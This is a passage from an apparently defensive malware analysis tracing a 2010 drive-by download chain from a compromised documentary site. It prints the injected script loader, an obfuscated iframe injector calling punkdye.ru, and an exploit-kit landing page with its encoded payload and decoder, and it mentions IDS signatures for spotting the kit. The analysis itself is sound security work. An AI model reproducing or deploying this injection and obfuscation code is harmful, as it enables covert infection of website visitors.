<meta name="keywords" content="Watch Louis Theroux: America's Medicated Kids Online, Watch Louis Theroux: America's Medicated Kids 2010, Watch Documentaries Free, Watch Documentaries Online" />
<link rel="icon" type="image/x-icon" href="http://deliver.theiwatchnetwork.com/5/images-css/browser.ico" />
<link rel="stylesheet" type="text/css" href="http://deliver.theiwatchnetwork.com/5/iwatch_06.css" media="screen" />
<script type="text/javascript" src="http://deliver.theiwatchnetwork.com/5/iwatch_05.js"></script>
<script type="text/javascript">
window.onload=function(){ update_link_ratings() }
function update_link_ratings() {
document.getElementById('s201366494').innerHTML = '<font color="#009900">100%</font>';
}
</script>
---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
</body>
</html>
Now, what is going to cause the client to end up requesting the drive by is the contents of the http://deliver.theiwatchnetwork.com/5/iwatch_05.js JavaScript file. When the client requests this, the end of that JavaScript contains this at the very end:
HTTP/1.1 200 OK
Cache-Control: max-age=6048000
Connection: keep-alive
Content-Length: 156825
Content-Type: application/x-javascript
Date: Fri, 13 Aug 2010 <REMOVED>
ETag: <REMOVED>
Expires: Fri, 22 Oct 2010 <REMOVED>
Last-Modified: Thu, 12 Aug 2010 <REMOVED>
Server: CacheFlyServe v26b
X-CF1: fC.ord1:hf
---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Facebook.js"></scri'+'pt>');
This of course causes the client to make a request to the http://pocketblock.ru/Facebook.js, here is the content of the response of the server from that request, in its entirety:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 1256
try{
var U3uj00dp58;
function Xgdvqin(){
if (typeof(document.body) == 'object'){
clearInterval(U3uj00dp58);
}else{
return true;
}
Ek09wc1guj = '';
Rlg92ocpa = ['src','h>e>ingnh>tv'.replace(/[vn,4\>]/g, ''), 'wzi#dpt#hM'.replace(/[M#z\!p]/g, '')];
function Gp3paj1lm(Eta8efwl037,Vmmu4gc2m,Imzsoblt938q4f){
return Eta8efwl037.setAttribute(Vmmu4gc2m,Imzsoblt938q4f);
}
function Yjcsup30i4t(Idfrg0lo9s){
return document.createElement(Idfrg0lo9s);
}
Elakx6em19 = 'p';
Xf2wek912 = window.frames.length;
if (Xf2wek912<20) Elakx6em19 = 'i5f4r5anm4e<'.replace(/[\<5\]4n]/g, '');
Egi14av = 'US';
Vt5pcf3zu80 = '2679997376';
Oskptba3 = 'http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09='+Xf2wek912;
Nnkuah4e4bj4 = 1060243405;
Ki6v57vs = Yjcsup30i4t('div');
Ki6v57vs.id = 'Ai6lruxkgj';
Ki6v57vs.name = 'Ai6lruxkgj';
Nnkuah4e4bj4 -= 530121702.5*2;
document.body.appendChild(Ki6v57vs);
H9cgm6y3fl = 'Nnkuah4e4bj4';
L2h514hotu = new Array(Oskptba3, Nnkuah4e4bj4,Nnkuah4e4bj4);
Cgnjln5alh = document.createElement(Elakx6em19);
for (Eizoi0xp in Rlg92ocpa){
Gp3paj1lm(Cgnjln5alh,Rlg92ocpa[Eizoi0xp], L2h514hotu[Eizoi0xp]);
}
document.getElementById('Ai6lruxkgj').appendChild(Cgnjln5alh);
}
U3uj00dp58 = window.setInterval(Xgdvqin, '300');
}catch(Ekdyic4zi9u){}
Now we could deobfuscate this, but we don’t really have to. It is pretty obvious that this piece of JavaScript is going to cause the client to go to punkdye.ru on port 8080 through an iframe, and that seems just a little bit more than suspicious. And of course, the client then makes this request next:
GET /index.php?pid=1&Cxuuxx0tgpkezo09=0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.iwatchdocumentaries.com/documenatries/louis-theroux-americas-medicated-kids-2010/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
Which gives us this response from the server that is obfuscated data and JavaScript that is the landing page of this type of drive by kit (whos name I am unsure of). This response is able to be sig’d on based on the hidden visibility div tag with great accuracy:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Set-Cookie: pid=1; expires=Fri, 13-Aug-2010 <REMOVED>
e95
<html>
<head><title>Xrgea3q5co5j0</title></head><body>
<div style="visibility: hidden;"><div name="Maz84dbeq" id="Maz84dbeq">102Q99Q37Q37Q97Q108Q96Q114Q106Q98Q107Q113Q43Q94Q105Q105Q38Q35Q35Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q83Q98Q111Q112Q102Q108Q107Q43Q102Q107Q97Q98Q117Q76Q99Q37Q36Q74Q80Q70Q66Q29Q52Q43Q36Q38Q30Q58Q42Q46Q38Q38Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q116Q111Q102Q113Q98Q37Q31Q57Q102Q99Q111Q94Q106Q98Q29Q112Q111Q96Q58Q89Q31Q101Q96Q109Q55Q44Q44Q112Q98Q111Q115Q102Q96Q98Q112Q44Q112Q98Q94Q111Q96Q101Q60Q110Q114Q98Q111Q118Q58Q35Q113Q108Q109Q102Q96Q58Q101Q96Q109Q55Q44Q44Q112Q118Q112Q113Q98Q106Q44Q112Q118Q112Q102Q107Q99Q108Q44Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q</div>
<div name="K69m8203" id="K69m8203">34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q43Q43Q34Q50Q64Q43Q43Q34Q50Q64Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q114Q45Q45Q48Q99Q112Q115Q111Q58Q34Q48Q64Q112Q96Q111Q102Q109Q113Q40Q97Q98Q99Q98Q111Q34Q48Q66Q98Q115Q94Q105Q34Q47Q53Q114Q107Q98Q112Q96Q94Q109Q98Q34Q47Q53Q34Q47Q52Q107Q98Q116Q34Q47Q63Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q116Q112Q96Q111Q102Q109Q113Q43Q112Q101Q98Q105Q105Q34Q47Q50Q47Q47Q34Q47Q50Q47Q54Q43Q79Q114Q107Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q96Q106Q97Q34Q47Q63Q34Q47Q50Q47Q67Q96Q34Q47Q63Q96Q97Q34Q47Q63Q43Q43Q34Q47Q50Q47Q67Q34Q47Q50Q47Q51Q98Q96Q101Q108Q34Q47Q63Q99</div>
<div name="Wq67wbxt8" id="Wq67wbxt8">Q114Q107Q96Q113Q102Q108Q107Q34Q47Q63Q94Q54Q34Q47Q50Q47Q53Q95Q51Q34Q47Q50Q47Q54Q34Q47Q50Q52Q63Q111Q83Q92Q92Q34Q47Q50Q48Q63Q99Q108Q111Q34Q47Q50Q47Q53Q102Q83Q95Q51Q43Q105Q98Q107Q100Q113Q101Q34Q47Q50Q48Q63Q102Q34Q47Q50Q48Q66Q83Q45Q34Q47Q50Q48Q63Q102Q42Q42Q34Q47Q50Q47Q54Q111Q34Q47Q50Q47Q63Q83Q95Q51Q43Q96Q101Q94Q111Q62Q113Q34Q47Q50Q47Q53Q102Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q111Q98Q113Q114Q111Q107Q34Q47Q63Q111Q34Q47Q50Q52Q65Q107Q98Q116Q34Q47Q63Q67Q114Q107Q96Q113Q102Q108Q107Q34Q47Q50Q47Q53Q94Q54Q34Q47Q50Q47Q53Q92Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q47Q34Q47Q50Q47Q64Q71Q98Q117Q98Q43Q113Q111Q94Q113Q112Q71Q34Q47Q50Q47Q53Q34Q47Q50Q50Q65Q71Q98Q105Q102Q71Q34Q47Q50Q410007Q63Q71Q67Q108Q81Q98Q115Q94Q80Q71Q34Q47Q50Q50Q63Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q50Q65Q71Q118Q97Q108Q63Q98Q112Q107Q108Q71Q34Q47Q50Q47Q63Q71Q109Q112Q98Q111Q71Q34Q47Q50Q50Q63Q117Q34Q47Q50Q47Q53Q98Q113Q102Q111Q84Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q107Q98Q109Q76Q43Q108Q34Q47Q50Q48Q63Q46Q83Q98Q109Q118Q81Q43Q108Q34Q47Q50Q48Q63Q48Q83Q98Q97Q108Q74Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q105Q105Q114Q107Q34Q47Q50Q47Q53Q97Q107Q98Q112Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q45Q34Q47Q50Q47Q64Q71Q46Q83Q97Q102Q109Q34Q47Q50Q47Q51Q46Q83Q97Q102Q34Q47Q50Q48Q67Q109Q101Q109Q43Q98Q106Q108Q96Q105Q98Q116Q34Q47Q50Q47Q67Q45Q53Q45Q53Q34Q47Q50Q48Q62Q114Q111Q43Q98Q118Q97Q104Q107Q114Q109Q34Q47Q50Q47Q67Q34Q47Q50Q47Q67Q34Q47Q50Q48Q62Q109Q113Q113Q101Q71Q34Q47Q50Q47Q64Q71Q81Q66Q68Q71Q3</div>
<div name="Kpe0uous6" id="Kpe0uous6">4Q47Q50Q47Q53Q107Q98Q109Q108Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q71Q77Q81Q81Q69Q73Q71Q34Q47Q50Q47Q63Q71Q74Q85Q43Q113Q99Q108Q112Q108Q111Q96Q102Q74Q71Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q118Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q108Q34Q47Q50Q48Q63Q71Q106Q94Q98Q111Q113Q80Q43Q63Q65Q76Q65Q62Q71Q83Q118Q34Q47Q50Q48Q63Q34Q47Q50Q50Q65Q71Q113Q96Q98Q71Q34Q47Q50Q47Q63Q71Q103Q95Q76Q85Q98Q115Q102Q71Q34Q47Q50Q47Q63Q71Q113Q96Q62Q71Q34Q47Q50Q50Q63Q112Q102Q101Q113Q34Q47Q63Q83Q34Q47Q63Q94Q92Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q34Q47Q50Q48Q66Q43Q103Q112Q34Q47Q50Q47Q51Q96Q112Q96Q111Q102Q109Q113Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q97Q98Q105Q34Q47Q63Q34Q47Q50Q47Q67Q110Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q112Q113Q94Q111Q113Q43Q98Q117Q98Q34Q47Q50Q52Q64Q113Q94Q112Q104Q104Q102Q105Q105Q34Q47Q63Q34Q47Q50Q47Q67Q67Q34Q47Q63Q34Q47Q50Q47Q67Q70Q74Q34Q47Q63Q101Q98Q105Q109Q34Q47Q50Q47Q62Q34Q47Q50Q47Q47Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q71Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q49Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q83Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q51Q46Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q5</div>
<div name="Yj0jepw" id="Yj0jepw">0Q47Q67Q92Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q64Q45Q34Q47Q50Q47Q64Q46Q34Q47Q50Q47Q54Q34Q47Q52Q34Q47Q54Q34Q47Q54Q34Q48Q64Q34Q47Q67Q112Q96Q111Q102Q109Q113Q34Q48Q66Q89Q31Q59Q57Q44Q102Q99Q111Q94Q106Q98Q59Q31Q38Q56Q7Q29Q29Q29Q29Q65Q51Q95Q102Q119Q52Q50Q45Q29Q58Q29Q107Q98Q116Q29Q62Q111Q111Q94Q118Q37Q31Q62Q96Q111Q108Q77Q65Q67Q43Q77Q65Q67Q31Q41Q29Q31Q77Q65Q67Q43Q77Q97Q99Q64Q113Q111Q105Q31Q38Q56Q7Q29Q29Q29Q29Q99Q108Q111Q37Q102Q29Q102Q107Q29Q65Q51Q95Q102Q119Q52Q50Q45Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q78Q96Q97Q100Q96Q102Q102Q29Q58Q29Q107Q98Q116Q29Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q37Q65Q51Q95Q102Q119Q52Q50Q45Q88Q102Q90Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q78Q96Q97Q100Q96Q102Q102Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q75Q108Q113Q98Q112Q46Q43Q109Q97Q99Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q85Q107Q50Q46Q110Q46Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q2</div>
<div name="Myiyhsd" id="Myiyhsd">9Q29Q29Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q29Q58Q29Q97Q108Q96Q114Q106Q98147cQ107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q62Q109Q109Q105Q98Q113Q46Q43Q101Q113Q106Q105Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q66Q99Q98Q53Q46Q101Q113Q95Q38Q56Q7Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q112Q29Q58Q29Q88Q31Q46Q52Q49Q43Q46Q49Q48Q43Q46Q49Q50Q43Q47Q48Q49Q31Q41Q29Q31Q46Q53Q49Q43Q53Q47Q43Q48Q53Q43Q51Q53Q31Q41Q29Q31Q46Q54Q53Q43Q46Q49Q50Q43Q46Q46Q51Q43Q52Q46Q31Q41Q29Q31Q47Q45Q52Q43Q46Q54Q46Q43Q47Q47Q54Q43Q46Q51Q51Q31Q41Q29Q31Q47Q45Q52Q43Q50Q53Q43Q46Q53Q54Q43Q46Q48Q48Q31Q41Q29Q31Q47Q46Q47Q43Q46Q52Q50Q43Q49Q50Q43Q47Q49Q50Q31Q41Q29Q31Q51Q53Q43Q47Q48Q48Q43Q49Q43Q47Q52Q31Q90Q56Q7</div>
<div name="Rn9yw5z" id="Rn9yw5z">Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q29Q58Q29Q102Q109Q112Q88Q74Q94Q113Q101Q43Q111Q108Q114Q107Q97Q37Q74Q94Q113Q101Q43Q111Q94Q107Q97Q108Q106Q37Q38Q29Q39Q29Q37Q102Q109Q112Q43Q105Q98Q107Q100Q113Q101Q42Q46Q38Q29Q38Q90Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q114Q29Q58Q29Q31Q101Q113Q113Q109Q55Q29Q42Q71Q42Q103Q94Q111Q29Q42Q71Q89Q89Q89Q89Q31Q40Q102Q109Q40Q31Q89Q89Q109Q114Q95Q105Q102Q96Q89Q89Q45Q45Q46Q43Q103Q94Q111Q29Q107Q108Q107Q98Q31Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q116Q102Q107Q97Q108Q116Q43Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q75Q94Q106Q98Q29Q58Q58Q29Q31Q74Q102Q96Q111Q108Q112Q108Q99Q113Q29Q70Q107Q113Q98Q111Q107Q98Q113Q29Q66Q117Q109Q105Q108Q111Q98Q111Q31Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q96Q105Q94Q112Q112Q102Q97Q29Q58Q29Q31Q96Q105Q112Q102Q97Q55Q64Q62Q67Q66Q66Q67Q62Q64Q42Q65Q66Q64Q52Q42Q45Q45Q45Q45Q42Q45Q45Q45Q45Q42Q62Q63Q64Q65Q66Q67Q67Q66Q65Q64Q63Q62Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q98Q105Q112Q98Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q</div>
<div name="L5je7fp0v" id="L5je7fp0v">29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q107Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q107Q109Q111Q114Q107Q113Q102Q106Q98Q42Q112Q96Q111Q102Q109Q113Q94Q95Q105Q98Q42Q109Q105Q114Q100Q102Q107Q56Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q103Q94Q115Q94Q42Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q42Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q108Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q107Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q96Q94Q113Q96Q101Q29Q37Q98Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q7Q29Q29Q29Q29</div>
</div><input type="checkbox" id="Hn6bgn" value="ent" checked="checked"><div></div>
<script type="text/javascript" language="javascript" src="jquery.jxx?v=5.3.4"></script>
<script>
/*
setTimeout("window.replace", "1000");
*/
function Vrkhh92v(Hz7aw3e5){
Sip00o6a = document;
Xkwimls51 = Sip00o6a.getElementById(Hz7aw3e5);
return Xkwimls51.innerHTML;
}
var G5y6hww = "";
var D7a95toi = ["Maz84dbeq", "K69m8203", "Wq67wbxt8", "Kpe0uous6", "Yj0jepw", "Myiyhsd", "Rn9yw5z", "L5je7fp0v"]
var G5y6hww = "";
for (Xeo365t in D7a95toi){
G5y6hww += Vrkhh92v(D7a95toi[Xeo365t]);
}
U6blttq5y = "document";
U6blttq5y = eval(U6blttq5y);
if ( typeof(Mo9g0b0) == 'u(n.d.e%f.isn#e(d('.replace(/[\(\.%s#]/g, '')) Mo9g0b0 = "Pzjiudfwlw";
function D0irg1(Bufe23){U6blttq5y.write(Bufe23);}
function O7b076s(G5y6hww) {
Dw5jypjgw = G5y6hww.split(Mo9g0b0);
var Baout4e = "";
for (var Hz7aw3e5=0;Hz7aw3e5<Dw5jypjgw.length-1;Hz7aw3e5++) {
Id3pgs = parseInt(Dw5jypjgw[Hz7aw3e5]);
Id3pgs += 3;
Baout4e += String.fromCharCode(Id3pgs);
}
return(Baout4e);
}
D0irg1('<script language="javascript">'+O7b076s(G5y6hww)+'<[/[s[chr(i7p7t[>h'.replace(/[h7k\[\(]/g, ''));
</script>
</body>
</html>
0
This then causes the client to make a request for the content of http://punkdye.ru:8080/jquery.jxx?v=5.3.4. This URI is able to be sig’d on with IDS’s such as Snort to let you know a client has been hitting one of these drive by’s:
GET /jquery.jxx?v=5.3.4 HTTP/1.1
Accept: */*
Referer: http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
Cookie: pid=1
The response to this request contains very little information, however it is key to making the deobfuscation of the data within the div tags be executed properly by the browser:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 22
eval("Mo9g0b0='Q';");
After the browser has this piece of information, it is able to deobfuscate and execute the following JavaScript which is a result of the data hidden in the div’s along with the deobfuscation logic in the JavaScript:
